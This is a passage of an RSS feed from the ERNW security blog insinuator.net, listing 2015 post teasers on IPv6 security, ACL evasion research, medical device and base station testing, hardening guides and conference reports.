      <description>&lt;p&gt;Hello everybody,&lt;/p&gt;&#xA;&lt;p&gt;Some of you might use WebEx in their daily life. And some of you might use Linux (as I and many of us do). However, this combination often results in issues with your PC’s sound or microphone use in a WebEx session.&lt;/p&gt;&#xA;&lt;p&gt;The problem here is that WebEx won’t run as intended with Firefox and JRE x64. But the solution is quite easy! Use the x86-versions of each.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Reflections on Vulnerability Disclosure</title>
      <link>https://insinuator.net/2015/07/reflections-on-vulnerability-disclosure/</link>
      <pubDate>Tue, 14 Jul 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/07/reflections-on-vulnerability-disclosure/</guid>
      <description>&lt;p&gt;In this post I’ll discuss some aspects of vulnerability disclosure. I don’t want to delve into an abstract &amp;amp; general discussion of vulnerability disclosure (for those interested &lt;a href=&#34;http://googleprojectzero.blogspot.de/2015/02/feedback-and-data-driven-updates-to.html&#34;&gt;here’s some discussion&lt;/a&gt; in the context of Google’s Project Zero, &lt;a href=&#34;http://www.cert.org/vulnerability-analysis/vul-disclosure.cfm&#34;&gt;this is the well-known CERT/CC approach&lt;/a&gt;, &lt;a href=&#34;http://weis2006.econinfosec.org/docs/17.pdf&#34;&gt;this a paper from WEIS 2006&lt;/a&gt; laying out some variants, and finally &lt;a href=&#34;https://www.schneier.com/essays/archives/2007/01/schneier_full_disclo.html&#34;&gt;some statement by Bruce Schneier back in 2007&lt;/a&gt;). Instead I will lay out which approach we followed in the past (and why we did so) and which developments make us consider it necessary to re-think our way of handling. The post is not meant to provide definitive answers; it was also written not least to provide clarity for ourselves (“write down a problem in order to better penetrate it”) and, maybe, to serve as a starting point for a discussion which will help the community (and us) to find a position on some of the inherent challenges.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Evasion of Cisco ACLs by (Ab)Using IPv6 – Part 2</title>
      <link>https://insinuator.net/2015/07/evasion-of-cisco-acls-by-abusing-ipv6-part-2/</link>
      <pubDate>Wed, 08 Jul 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/07/evasion-of-cisco-acls-by-abusing-ipv6-part-2/</guid>
      <description>&lt;p&gt;When we wrote our initial blogpost regarding the &lt;a href=&#34;http://www.insinuator.net/2015/01/evasion-of-cisco-acls-by-abusing-ipv6-discussion-of-mitigation-techniques/&#34;&gt;evasion of Cisco ACLs by (Ab)Using IPv6&lt;/a&gt;, where we described (&lt;a href=&#34;http://www.insinuator.net/2015/01/the-persistent-problem-of-state-in-ipv6-security/&#34;&gt;known to Cisco&lt;/a&gt;) cases of Access Control Lists (ACL) circumvention, we also suggested some mitigation techniques including the blocking of some (if not all) IPv6 Extension Headers.&lt;br&gt;&#xA;Almost a month later, we got &lt;a href=&#34;http://www.insinuator.net/2015/01/evasion-of-cisco-acls-by-abusing-ipv6-discussion-of-mitigation-techniques/#respond&#34;&gt;a comment&lt;/a&gt; from &lt;em&gt;Matej Gregr&lt;/em&gt; that, even if the ACLs of certain Cisco Switches are configured to block IPv6 Extension headers like Hop-by-Hop or Destination Options headers, this does not actually happen/work as expected. Of course this made us re-visit the lab in the interim ;-).&lt;/p&gt;</description>
    </item>
    <item>
      <title>The patient’s last words: I am not a target!</title>
      <link>https://insinuator.net/2015/07/the-patients-last-words-i-am-not-a-target/</link>
      <pubDate>Wed, 01 Jul 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/07/the-patients-last-words-i-am-not-a-target/</guid>
      <description>&lt;p&gt;Last week I gave a short interview for Süddeutsche Zeitung on the security of medical devices. You can find it &lt;a href=&#34;http://www.sueddeutsche.de/wirtschaft/medizintechnik-naechtliches-desaster-1.2534424&#34;&gt;here&lt;/a&gt;. Unfortunately it is in German so I decided to sum up some of my key points that made it into the article and some that didn’t in this blog post.&lt;/p&gt;&#xA;&lt;p&gt;The medical devices that we have been looking into include patient monitors, syringe pumps, EEGs, home monitoring devices and an MRI. All of these devices had major flaws that look like they came straight out of the 90s. Sometimes, we were able to crash the machines by simply doing a port scan, sometimes we could get around access controls protecting PIN codes of devices, and in most cases we were able to render the machine unusable. All these attacks were performed over the network and no physical access to the device was needed.&lt;/p&gt;</description>
    </item>
    <item>
      <title>BT SnoopCon</title>
      <link>https://insinuator.net/2015/06/bt-snoopcon/</link>
      <pubDate>Mon, 29 Jun 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/06/bt-snoopcon/</guid>
      <description>&lt;p&gt;I had the honour to be invited to &lt;a href=&#34;http://www.bt.com&#34;&gt;BT&lt;/a&gt;‘s SnoopCon, which is their annual internal conference for people involved with security at BT. There were several external and internal speakers and I was stunned by the quality of the talks and the collaborative atmosphere. Since this event is somewhat internal (even though I’m obviously allowed to talk about it), I won’t go into details, however there were two particularly great talks about military war games (which I personally enjoyed very much given my history in CTF contests) and PoS security.&lt;/p&gt;</description>
    </item>
    <item>
      <title>CSA.no Nordic Summit</title>
      <link>https://insinuator.net/2015/06/csa.no-nordic-summit/</link>
      <pubDate>Sun, 28 Jun 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/06/csa.no-nordic-summit/</guid>
      <description>&lt;p&gt;Flo and I had the pleasure to present at the &lt;a href=&#34;https://csanorway.no/&#34;&gt;CSA&lt;/a&gt; &lt;a href=&#34;https://csanordicsummitandsummercon2015.sched.org/&#34;&gt;Nordic Summit&lt;/a&gt; in Norway. Being in Oslo for the first time, we enjoyed the conference (small, familiar atmosphere) very much and want to thank Lars and Kai for putting together such a good event &amp;amp; having us there!&lt;/p&gt;&#xA;&lt;p&gt;Our slides can be found here:&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://www.ernw.de/download/ERNW_CSA-No-Summit_Hacking_Medical_Devices_fgrunow.pdf&#34;&gt;Hacking Medical Devices&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://www.ernw.de/download/ERNW_CSA-No-Summit_ToolsOfTheTrade_mluft.pdf&#34;&gt;Tools of the Trade: Lessons Learned from the (C)ISO’s Desk&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt; &lt;/p&gt;&#xA;&lt;p&gt;best,&lt;/p&gt;&#xA;&lt;p&gt;Matthias&lt;/p&gt;</description>
    </item>
    <item>
      <title>Internet Information Service 7.5 Hardening Guide</title>
      <link>https://insinuator.net/2015/06/internet-information-service-7.5-hardening-guide/</link>
      <pubDate>Fri, 26 Jun 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/06/internet-information-service-7.5-hardening-guide/</guid>
      <description>&lt;p&gt;Internet Information Services (IIS) contains several components that perform important functions for the application and Web server roles in Windows Server. As it is designed to be used in an enterprise environment, the security of this system must be kept at a high level.&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;By default IIS implements a lot of basic security measures, but are these the relevant ones to protect your business?&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;In order to answer this question for one of our customers, we have compiled the most relevant security settings in an IIS 7.5 Hardening Guide for you. In this guide we define a baseline security level, which is to be used for so called “crash and burn systems” (systems with non-critical data, systems whose availability have no business relevant impact) and a security level high, which includes all other systems. The mitigations in the baseline section are non-critical and therefore no further test are necessary. The mitigation in the section high, are critical in terms of availability and need to be tested extensively. The system owner must decide, which security level is the right one for their system, and which mitigation from section high are mandatory for their system.&lt;/p&gt;</description>
    </item>
    <item>
      <title>NANOG64</title>
      <link>https://insinuator.net/2015/06/nanog64/</link>
      <pubDate>Fri, 26 Jun 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/06/nanog64/</guid>
      <description>&lt;p&gt;I recently had the pleasure to join the &lt;a href=&#34;https://www.nanog.org/meetings/nanog64&#34;&gt;64th NANOG&lt;/a&gt; (North American Network Operators’ Group) meeting in San Francisco, which can be understood as one of the largest Internet engineering conferences at all. It takes place three times a year at different locations in North America.&lt;/p&gt;&#xA;&lt;p&gt;What I personally like about NANOG is its strong collaborative and cooperative character. It is not about single persons and also not too much about spectacular projects but more about discussing technologies, ideas, challenges and numbers. Every talk has a comparatively large time slot reserved for discussion, which is often more than fully used. Discussion is typically actively focused and is more time-consuming (and even more relevant) than the talk itself. Which often is intended by the community. The climate of discussion is almost always impressively polite and constructive, even for controversially discussed topics.&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 Adress Planning / Some Notes</title>
      <link>https://insinuator.net/2015/06/ipv6-adress-planning-/-some-notes/</link>
      <pubDate>Tue, 16 Jun 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/06/ipv6-adress-planning-/-some-notes/</guid>
      <description>&lt;p&gt;In the course of a customer project I recently documented some thoughts and general objectives of IPv6 address planning, expanding on stuff I wrote a while ago in the &lt;a href=&#34;http://www.insinuator.net/2014/05/ipv6-address-plan-considerations-part-3-the-plan/&#34;&gt;series on “Address Plan Considerations”&lt;/a&gt;. An excerpt of that (newer) document &lt;a href=&#34;https://www.ernw.de/download/ERNW_IPv6_Adressplanung.pdf&#34;&gt;can be found here&lt;/a&gt;. Due to the context it originates from it’s in German, still I hope it’s useful for some readers.&lt;br&gt;&#xA;If you’re interested in the topic it might be a good idea to listen to &lt;a href=&#34;https://twitter.com/ipv6tom&#34;&gt;Tom Coffeen&lt;/a&gt;‘s talk at the upcoming &lt;a href=&#34;http://www.ipv6conference.ch/sessions/&#34;&gt;IPv6 Business Conference&lt;/a&gt;, too.&lt;/p&gt;</description>
    </item>
    <item>
      <title>An unpacker for Alcatel TiMOS images</title>
      <link>https://insinuator.net/2015/06/an-unpacker-for-alcatel-timos-images/</link>
      <pubDate>Fri, 12 Jun 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/06/an-unpacker-for-alcatel-timos-images/</guid>
      <description>&lt;p&gt;Hi,&lt;/p&gt;&#xA;&lt;p&gt;I wrote a small python script that extracts the content from Alcatel .tim firmware files. It took some time staring at hex values, as well as a fair amount of guess work to figure out the file format.&lt;/p&gt;&#xA;&lt;p&gt;All .tim files start with a common header, containing the TiMOS version string, the build string, the used compression algorithm and the number of segments included in the file. The common header is followed by a header for each segment in the file. The segment header contains values like the name of the segment, the beginning of the segment in the image file, the size of the segment, compressed as well as extracted, a checksum of the decompressed data and also the base address and entry point of the data in the routers memory. A segment header can look like this:&lt;/p&gt;</description>
    </item>
    <item>
      <title>TACACS&#43; module for loki</title>
      <link>https://insinuator.net/2015/06/tacacs-module-for-loki/</link>
      <pubDate>Wed, 10 Jun 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/06/tacacs-module-for-loki/</guid>
      <description>&lt;p&gt;There has been, again, some development within the loki domain. Today I’m going to write about the latest module added to the suite, a module for decoding and cracking Cisco’s TACACS+.&lt;/p&gt;&#xA;&lt;p&gt;TACACS is the Terminal Access Controller Access-Control System, a protocol for handling remote user authentication and central access control. It originated in 1984 and was used in the old Unix world. TACACS+ is a related protocol developed by Cisco Systems and is widely used for AAA (Authentication, Authorization, Accounting) on IOS based devices. It was released as an &lt;a href=&#34;http://tools.ietf.org/html/draft-grant-tacacs-02&#34;&gt;open standard&lt;/a&gt; in 1993 (and expired in 1998 by the way ;-)).&lt;/p&gt;</description>
    </item>
    <item>
      <title>ERNW @PHDays V in Moscow</title>
      <link>https://insinuator.net/2015/06/ernw-@phdays-v-in-moscow/</link>
      <pubDate>Tue, 09 Jun 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/06/ernw-@phdays-v-in-moscow/</guid>
      <description>&lt;p&gt;Здравствуйте Insinuator Followers,&lt;/p&gt;&#xA;&lt;p&gt;End of May eight ERNW members were travelling to Moscow (Russia) to visit the &lt;a href=&#34;http://www.phdays.com/&#34;&gt;PHDays V&lt;/a&gt; conference. It was a very nice trip because we met a lot of gentle people, ate some great food and had quite some fun in this exciting and history-charged metropole, and we were able to get around using hands and feet (and Google translate ;-)).&lt;/p&gt;&#xA;&lt;p&gt;The remainder of this post contains summaries of some of the most interesting talks at PHD V:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Advanced Security Evaluation of Network Protocols</title>
      <link>https://insinuator.net/2015/06/advanced-security-evaluation-of-network-protocols/</link>
      <pubDate>Mon, 08 Jun 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/06/advanced-security-evaluation-of-network-protocols/</guid>
      <description>&lt;p&gt;Hi,&lt;/p&gt;&#xA;&lt;p&gt;I’m back from London where I gave a talk about security evaluation of proprietary network protocols. I had a great time at &lt;a href=&#34;http://www.infosecurityeurope.com/en/education/education-programme/Session-Search-Pages/intelligence-defence/&#34;&gt;InfoSecurity Intelligent Defence&lt;/a&gt; and &lt;a href=&#34;https://www.securitybsides.org.uk/&#34;&gt;BSides London&lt;/a&gt;, many thanks for inviting me and giving me the opportunity to speak to so much nice people.&lt;/p&gt;&#xA;&lt;p&gt;Find the abstract and the download link to the slides after the break.&lt;/p&gt;&#xA;&lt;blockquote&gt;&#xA;&lt;p&gt;Even in the time of Cloud-based security tools, behavior- and machine learning-based APT detection and colorful security appliances, a lot of vulnerabilities are still buried deep within the protocol layers. For security researchers it is quite a challenge to find those in well documented protocols (take SSL for an example), and when it comes to proprietary protocols, the bar is raised even (significantly) higher. This keynote will show that there is still an urgent need for security evaluation on (undocumented) network protocols, discuss war stories on protocol fails, and also give an introduction into the methodology of protocol reversing and how those protocol fails could have been avoided.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Is IPv6 more Secure than IPv4? Or Less?</title>
      <link>https://insinuator.net/2015/06/is-ipv6-more-secure-than-ipv4-or-less/</link>
      <pubDate>Mon, 08 Jun 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/06/is-ipv6-more-secure-than-ipv4-or-less/</guid>
      <description>&lt;p&gt;&lt;a href=&#34;http://www.hoggnet.com/&#34;&gt;Scott Hogg&lt;/a&gt; recently (in his post “&lt;a href=&#34;https://community.infoblox.com/blogs/2015/02/10/holding-ipv6-neighbor-discovery-higher-standard-security&#34;&gt;Holding IPv6 Neighbor Discovery to a Higher Standard of Security&lt;/a&gt;“) gave the following answer:&lt;/p&gt;&#xA;&lt;p&gt;“The security of IPv4 is roughly equivalent to IPv6. So why do we expect more from IPv6?”&lt;/p&gt;&#xA;&lt;p&gt;While I highly value Scott’s IPv6 expertise – not least because I learned a lot about IPv6 security from &lt;a href=&#34;http://www.ciscopress.com/store/ipv6-security-9781587055942&#34;&gt;the book on the topic&lt;/a&gt; he wrote together with &lt;a href=&#34;https://www.vyncke.org/ipv6status/&#34;&gt;Eric Vyncke&lt;/a&gt; – I strongly disagree with his statement, mainly with the first part. In this post I will lay out why I think that IPv6 is actually &lt;em&gt;less&lt;/em&gt; secure than IPv4.&lt;/p&gt;</description>
    </item>
    <item>
      <title>ERNW @Mudiator</title>
      <link>https://insinuator.net/2015/06/ernw-@mudiator/</link>
      <pubDate>Sun, 07 Jun 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/06/ernw-@mudiator/</guid>
      <description>&lt;p&gt;Today the ERNW Team participated in the &lt;a href=&#34;http://mudiator.com/&#34;&gt;Mudiator&lt;/a&gt; mud race in &lt;a href=&#34;https://www.google.de/maps/place/49%C2%B028&#39;11.7%22N+8%C2%B031&#39;34.6%22E/@49.469926,8.526285,17z&#34;&gt;Mannheim&lt;/a&gt;. This mud run features 25 obstacles over 8 km, you can do either one or two rounds. Participating for the first time, the ERNW team went for one round (the &lt;em&gt;Legionnaire&lt;/em&gt; distance as opposed to the two round &lt;em&gt;Hercules&lt;/em&gt; distance):&lt;/p&gt;&#xA;&lt;p&gt; &lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;http://www.insinuator.net/wp-content/uploads/2015/06/20150607_105045_small.jpg&#34;&gt;&lt;img src=&#34;http://www.insinuator.net/wp-content/uploads/2015/06/20150607_105045_small.jpg&#34; alt=&#34;20150607_105045_small&#34;&gt;&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;Following our idea of open access to knowledge (both about vulnerabilities and sports 😉 ), here are some hints/lessons learned:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Blog 5: Beyond the Thunderdome: &lt;BR /&gt; A Review of TROOPERS15</title>
      <link>https://insinuator.net/2015/06/blog-5-beyond-the-thunderdome-br-/-a-review-of-troopers15/</link>
      <pubDate>Wed, 03 Jun 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/06/blog-5-beyond-the-thunderdome-br-/-a-review-of-troopers15/</guid>
      <description>&lt;p&gt;&lt;a href=&#34;http://www.insinuator.net/wp-content/uploads/2015/06/Troopers13_101.jpg&#34;&gt;&lt;img src=&#34;http://www.insinuator.net/wp-content/uploads/2015/06/Troopers13_101-200x300.jpg&#34; alt=&#34;Troopers13_101&#34;&gt;&lt;/a&gt;     The final blog in our series “Beyond the Thunderdome: A Review of TROOPERS15” focuses Exploitation &amp;amp; Attacking. With the last of this series we hope we you are already fired up and inspired for what lays a head during our upcoming &lt;strong&gt;&lt;a href=&#34;http://www.troopers.de&#34;&gt;TROOPERS16&lt;/a&gt;&lt;/strong&gt; (March 14-18, 2016)! Can’t wait to see you there!&lt;/p&gt;&#xA;&lt;hr&gt;&#xA;&lt;p&gt; &lt;/p&gt;&#xA;&lt;p&gt;“The old is new, again. CVE20112461 is back” talk created and given by Luca Carettoni and Mauro Gentile&lt;/p&gt;</description>
    </item>
    <item>
      <title>ERNW@HAXPO/HITB 2015</title>
      <link>https://insinuator.net/2015/06/ernw@haxpo/hitb-2015/</link>
      <pubDate>Wed, 03 Jun 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/06/ernw@haxpo/hitb-2015/</guid>
      <description>&lt;p&gt;Last week we enjoyed quite a wonderful HAXPO exhibition and HITB conference in Amsterdam. A number of great talks could be heard at the main HITB conference such as “&lt;em&gt;Bootkit via SMS: 4G Access Level Security Assessment&lt;/em&gt;” or “&lt;em&gt;Stegosploit: Hacking with Pictures&lt;/em&gt;“. And not only that: there were also several engaging hands-on workshops.&lt;/p&gt;&#xA;&lt;p&gt;Apart from the main conference, there was the HAXPO – a hacker exhibition. At this exhibition you could connect with people from different companies, get a lot of merchandise, and also listen to several briefings on security and its philosophy. Fortunately, we had the pleasure to present two of these briefings and maybe you tested your web application skills at the ERNW booth.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Blog 4: Beyond the Thunderdome: &lt;BR/&gt;A Review of TROOPERS15</title>
      <link>https://insinuator.net/2015/06/blog-4-beyond-the-thunderdome-br/a-review-of-troopers15/</link>
      <pubDate>Mon, 01 Jun 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/06/blog-4-beyond-the-thunderdome-br/a-review-of-troopers15/</guid>
      <description>&lt;p&gt;&lt;a href=&#34;http://www.insinuator.net/wp-content/uploads/2015/06/Blog4.jpg&#34;&gt;&lt;img src=&#34;http://www.insinuator.net/wp-content/uploads/2015/06/Blog4-300x134.jpg&#34; alt=&#34;Blog4&#34;&gt;&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;We hope you are enjoying the ride as we continue our journey through IPv6. Below we have a great mix of talks, slides, and videos in this area posted below. We look forward to hosting more IPv6 (March 14^(th) &amp;amp; 15^(th)) talks next year at &lt;a href=&#34;http://www.troopers.de&#34;&gt;TROOPERS16&lt;/a&gt;!&lt;/p&gt;&#xA;&lt;hr&gt;&#xA;&lt;p&gt; &lt;/p&gt;&#xA;&lt;p&gt;“New Features of the SI6 Networks’IPv6 Toolkit” talk created and given by Fernando Gont&lt;/p&gt;&#xA;&lt;p&gt;The IPV6 Toolkit was originally developed for UK CPNI in an effort to enhance and be able to test the current state of IPv6 security. The toolkit itself was mainly developed for security analysis and trouble shooting of IPv6 networks and implementations. It is running on a wide range of *nix based systems (this probably is considered painful to support given that low level implementation of network functions) and release under the GPL. You can directly check it out here: &lt;a href=&#34;https://github.com/fgont/ipv6toolkit.&#34;&gt;https://github.com/fgont/ipv6toolkit.&lt;/a&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>Blog 3: Beyond the Thunderdome: A Review of TROOPERS15</title>
      <link>https://insinuator.net/2015/05/blog-3-beyond-the-thunderdome-a-review-of-troopers15/</link>
      <pubDate>Fri, 29 May 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/05/blog-3-beyond-the-thunderdome-a-review-of-troopers15/</guid>
      <description>&lt;p&gt;&lt;a href=&#34;http://www.insinuator.net/wp-content/uploads/2015/05/Blog3.jpg&#34;&gt;&lt;img src=&#34;http://www.insinuator.net/wp-content/uploads/2015/05/Blog3-300x163.jpg&#34; alt=&#34;Blog3&#34;&gt;&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;Welcome to the third edition of “Beyond the Thunderdome: A Review of&#xA;TROOPERS15”. The focus today is on IPv6 and Data Center Networks, so kick back&#xA;and enjoy the following talks and videos. And as always, check out our website&#xA;&lt;strong&gt;&lt;a href=&#34;http://www.troopers.de&#34;&gt;www.troopers.de&lt;/a&gt;&lt;/strong&gt; for details on TROOPERS16 March&#xA;14-18, 2016.&lt;/p&gt;&#xA;&lt;hr&gt;&#xA;&lt;p&gt; &lt;/p&gt;&#xA;&lt;p&gt;“Enabling and Securing IPv6 in Service Provider Networks” talk created and given by Tarko Titan&lt;/p&gt;&#xA;&lt;p&gt;Telekom.ee had no IPv6, 8 moths ago. They deployed IPv6 in about 4 weeks and by now about 6% of all transported traffic is IPv6 traffic. Actually the 4 weeks timeframe is a bit too optimistic but more on that later. Tarko first explains the biggest problems in the network migration, which were the access network and the Customer -Provider Edge (CPE). Also Telekom Estonia doesn’t want to make a tradeoff at security in the IPv6 deployment.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Blog 2: Beyond the Thunderdome:&lt;BR /&gt;A Review of TROOPERS15</title>
      <link>https://insinuator.net/2015/05/blog-2-beyond-the-thunderdomebr-/a-review-of-troopers15/</link>
      <pubDate>Wed, 27 May 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/05/blog-2-beyond-the-thunderdomebr-/a-review-of-troopers15/</guid>
      <description>&lt;p&gt;&lt;a href=&#34;http://www.insinuator.net/wp-content/uploads/2015/05/Blog2.cropped.jpg&#34;&gt;&lt;img src=&#34;http://www.insinuator.net/wp-content/uploads/2015/05/Blog2.cropped-300x137.jpg&#34; alt=&#34;Blog2.cropped&#34;&gt;&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;Today’s focus in our blog series will cover large-scale environments: Cryptography in Cloud environments and Network Automation. Since these topics will only become more important over time stay tuned for our &lt;a href=&#34;http://www.troopers.de&#34;&gt;TROOPERS16’s&lt;/a&gt; developing agenda to see what new talks will be available (or submit your own talk during our Call for Papers starting in August via our new CFP Submission tool!)&lt;/p&gt;&#xA;&lt;hr&gt;&#xA;&lt;p&gt; &lt;/p&gt;&#xA;&lt;p&gt;“Crypto in the Cloud” talk created and given by Frederik Armknecht&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 &amp; Complexity</title>
      <link>https://insinuator.net/2015/05/ipv6-complexity/</link>
      <pubDate>Wed, 27 May 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/05/ipv6-complexity/</guid>
      <description>&lt;p&gt;IPv6 is often called a “complex protocol”, not least by myself (for example in my &lt;a href=&#34;https://www.troopers.de/media/filer_public/42/1a/421a0a30-0a35-486a-b25e-7eea27f18ef7/troopers14-why_ipv6_security_is_so_hard-structural_deficits_of_ipv6_and_their_implications-enno_rey.pdf&#34;&gt;keynote to the IPv6 Security Summit 2014&lt;/a&gt;). In this post I want to have a quick look at three questions:&lt;/p&gt;&#xA;&lt;p&gt;– Can IPv6 be considered a “complex protocol”?&lt;br&gt;&#xA;– Is it “more complex” than IPv4?&lt;br&gt;&#xA;– Can we expect IPv6 networks to be “complex networks”?&lt;/p&gt;&#xA;&lt;p&gt;I’d like to start with some clarifications and a definition. First of all: when I discuss IPv6 “as a protocol”, this actually means “the IPv6 procotol family” incl. those helper protocols needed to support (“core”) IPv6 in performing properly in most networks, like ICMPv6 and MLD.&lt;br&gt;&#xA;Then, of course, we have to define the term “complexity”, which is a difficult task in itself. [MITCHELL2009] gives an overview of several potential (definition) approaches in a dedicated chapter and the same undertaking is performed – in quite different ways – by most of the authors of individual contributions to [PELITI1988].&lt;/p&gt;</description>
    </item>
    <item>
      <title>Beyond the Thunderdome:&lt;BR /&gt;A Review of TROOPERS15</title>
      <link>https://insinuator.net/2015/05/beyond-the-thunderdomebr-/a-review-of-troopers15/</link>
      <pubDate>Mon, 25 May 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/05/beyond-the-thunderdomebr-/a-review-of-troopers15/</guid>
      <description>&lt;p&gt;&lt;a href=&#34;http://www.insinuator.net/wp-content/uploads/2015/05/beyondthunderdome.jpg&#34;&gt;&lt;img src=&#34;http://www.insinuator.net/wp-content/uploads/2015/05/beyondthunderdome.jpg&#34; alt=&#34;beyondthunderdome&#34;&gt;&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;Here in Heidelberg we are already gearing up for TROOPERS16 (&lt;strong&gt;taking place from 14th to 18th March 2016&lt;/strong&gt;!). While you are preparing for our Call for Papers or waiting eagerly to sign up for your spot in one of our legendary trainings take a look at our newest blog series “Beyond the Thunderdome: A Review of TROOPERS15”. It may offer some inspiration, help you kill time while waiting for next year’s TROOPERS,  or for those that are new to our conference,  give you a taste for what TROOPERS is all about. See you soon at &lt;a href=&#34;http://www.troopers.de&#34;&gt;TROOPERS16&lt;/a&gt;!&lt;/p&gt;</description>
    </item>
    <item>
      <title>RIPE70 in Amsterdam</title>
      <link>https://insinuator.net/2015/05/ripe70-in-amsterdam/</link>
      <pubDate>Sun, 24 May 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/05/ripe70-in-amsterdam/</guid>
      <description>&lt;p&gt;Two weeks ago Christopher and I joined the RIPE70 meeting in Amsterdam. Being part of the group was fun as always and we had quite some interesting conversations with peers from the IPv6 community.&lt;/p&gt;&#xA;&lt;p&gt;We could even contribute a bit to some discussions, with two talks. I gave one titled “Will It Be Routed? – On IPv6 Address Space Allocation &amp;amp; Assignment Approaches in Very Large Organizations” in the Address Policy Working Group session on Wednesday. This is the abstract:&lt;/p&gt;</description>
    </item>
    <item>
      <title>ERNW @ HAXPO 2015</title>
      <link>https://insinuator.net/2015/05/ernw-@-haxpo-2015/</link>
      <pubDate>Wed, 20 May 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/05/ernw-@-haxpo-2015/</guid>
      <description>&lt;p&gt;There are lots of interesting places to visit in Amsterdam, but if you are there between the 26th and the 29th of May, then our booth at HAXPO exhibition should be your main destination.&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;http://haxpo.nl/haxpo2015ams/&#34;&gt;HAXPO&lt;/a&gt; is a great exhibition, where you can become up-to-date with the latest security technologies, attend various workshops and get in touch with more than 35 IT and information security companies. It will take place in the beautiful historical building “Beurs van Berlage” in the center of Amsterdam. As usual, ERNW will take part in HAXPO. We will be waiting for you in the Community Village section (booth NL-018). Come visit and get to know more about us. You are invited to take our hacking challenges, where the levels of complexity vary from beginners to advanced. Furthermore, we will bring our KNX hacking suitcase!&lt;/p&gt;</description>
    </item>
    <item>
      <title>How to Get a BaseStation</title>
      <link>https://insinuator.net/2015/05/how-to-get-a-basestation/</link>
      <pubDate>Sun, 17 May 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/05/how-to-get-a-basestation/</guid>
      <description>&lt;p&gt;In our &lt;a href=&#34;http://www.insinuator.net/2014/10/lte-vs-darwin-hackers-to-hackers-conference-11/&#34;&gt;talks&lt;/a&gt; in the past we showed what might be possible if an attacker gets access to backhaul and/or core network of a telecommunication provider. In a security analysts perspective this is really disgusting, but provider always will argument that those attack scenarios are not realistic.&lt;/p&gt;&#xA;&lt;p&gt; Because of legal restrictions we are not able to demonstrate this in practice (e.g. by breaking in into a BTS environment somewhere in the woods) but what we can do is this: building a lab.&lt;br&gt;&#xA;Sometimes it is really shocking what you can buy on Ebay, right? Here we got one very interesting component: a Huawei BBU3900 BaseStation which is used by a couple of providers. Okay, it is for GSM-Rail, but the technology behind is very equal. And for 100 dollars (plus shipping) you don’t ask further questions…&lt;/p&gt;</description>
    </item>
    <item>
      <title>Analysis of an Alarm System – Part 2/3</title>
      <link>https://insinuator.net/2015/05/analysis-of-an-alarm-system-part-2/3/</link>
      <pubDate>Tue, 12 May 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/05/analysis-of-an-alarm-system-part-2/3/</guid>
      <description>&lt;p&gt;A few days later than planned (sorry about that), but here we go with part 2 (&lt;a href=&#34;http://www.insinuator.net/2015/04/analysis-of-an-alarm-system/&#34;&gt;Part1&lt;/a&gt;) and the demodulation/analysis part.&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Initial Analysis&lt;/strong&gt;&lt;br&gt;&#xA;To analyse a captured signal, the tool baudline seems to be the best way at the moment. So we open it with the following options and have a closer look (ContextMenu-&amp;gt;Input-&amp;gt;Open file):&lt;/p&gt;&#xA;&lt;p&gt;&lt;img src=&#34;https://www.ernw.de/download/alarm_system/step3_baudlineOpenOptions.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;&#xA;&lt;p&gt;After using the open button, you should be able to see something similar to this:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Hek.si 2015</title>
      <link>https://insinuator.net/2015/05/hek.si-2015/</link>
      <pubDate>Tue, 05 May 2015 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2015/05/hek.si-2015/</guid>
